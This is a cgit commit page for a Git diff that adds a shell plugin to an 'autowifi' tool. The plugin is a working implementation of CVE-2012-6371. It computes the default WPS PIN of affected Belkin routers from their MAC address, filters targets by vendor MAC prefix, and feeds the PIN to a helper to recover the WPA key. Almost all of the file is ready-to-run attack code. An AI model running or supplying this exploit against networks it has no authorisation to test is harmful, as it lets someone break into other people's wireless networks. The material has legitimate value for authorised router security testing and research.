summaryrefslogtreecommitdiffstats
path: root/usr/lib/autowifi/plugins/11belkin_wps
diff options
context:
space:
mode:
Diffstat (limited to 'usr/lib/autowifi/plugins/11belkin_wps')
-rwxr-xr-xusr/lib/autowifi/plugins/11belkin_wps40
1 files changed, 40 insertions, 0 deletions
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..d4eb8e37
--- /dev/null
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,40 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
+# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
+# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+. ../lib/wps
+parse_plugin_args "$@"
+
+check_painmode
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
generated by cgit v1.2.3 (git 2.25.1) at 2025-10-30 23:36:55 +0000